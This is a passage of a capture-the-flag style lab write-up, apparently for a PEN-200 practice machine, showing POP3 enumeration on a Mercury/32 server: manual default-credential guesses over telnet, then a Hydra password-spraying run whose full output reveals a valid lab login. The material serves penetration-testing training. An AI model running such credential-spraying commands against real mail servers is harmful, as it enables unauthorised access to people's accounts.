POP3


Nmap discovered a POP3 server on the target port 110 The running service is Mercury/32 pop3d

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ telnet $IP 110                                                   
Trying 192.168.159.140...
Connected to 192.168.159.140.
Escape character is '^]'.
+OK <2262015.1200@localhost>, POP3 server ready.
USER NULL 
+OK NULL is known here.
PASS NULL
-ERR Username or password is invalid or incorrect.
USER admin 
+OK admin is known here.
PASS admin
-ERR Username or password is invalid or incorrect.
USER admin
+OK admin is known here.
PASS pass
-ERR Too many login failures - try again later.

N/A

Brute-Force Attack


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ hydra -U pop3                                                  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-04 15:26:42
 
Help for module pop3:
============================================================================
Module pop3 is optionally taking one authentication type of:
  CLEAR (default), LOGIN, PLAIN, CRAM-MD5, CRAM-SHA1,
  CRAM-SHA256, DIGEST-MD5, NTLM.
Additionally TLS encryption via STLS can be enforced with the TLS option.
 
Example: pop3://target/TLS:PLAIN
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ hydra -L ./users.txt -p SicMundusCreatusEst pop3://$IP/CLEAR -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-04 15:26:06
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task
[DATA] attacking pop3://192.168.159.140:110/CLEAR
[ATTEMPT] target 192.168.159.140 - login "admin" - pass "SicMundusCreatusEst" - 1 of 8 [child 0] (0/0)
[ATTEMPT] target 192.168.159.140 - login "magnus" - pass "SicMundusCreatusEst" - 2 of 8 [child 1] (0/0)
[ATTEMPT] target 192.168.159.140 - login "charlotte" - pass "SicMundusCreatusEst" - 3 of 8 [child 2] (0/0)
[ATTEMPT] target 192.168.159.140 - login "jonas" - pass "SicMundusCreatusEst" - 4 of 8 [child 3] (0/0)
[ATTEMPT] target 192.168.159.140 - login "martha" - pass "SicMundusCreatusEst" - 5 of 8 [child 4] (0/0)
[ATTEMPT] target 192.168.159.140 - login "postmaster" - pass "SicMundusCreatusEst" - 6 of 8 [child 5] (0/0)
[ATTEMPT] target 192.168.159.140 - login "newuser" - pass "SicMundusCreatusEst" - 7 of 8 [child 6] (0/0)
[ATTEMPT] target 192.168.159.140 - login "agnes" - pass "SicMundusCreatusEst" - 8 of 8 [child 7] (0/0)
[110][pop3] host: 192.168.159.140   login: jonas   password: SicMundusCreatusEst
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-04 15:26:07

Checking the strange string against all the enumerated users against the target POP3 server reveals that it’s a password belonging to the jonas user Mails will be checked through the IMAP server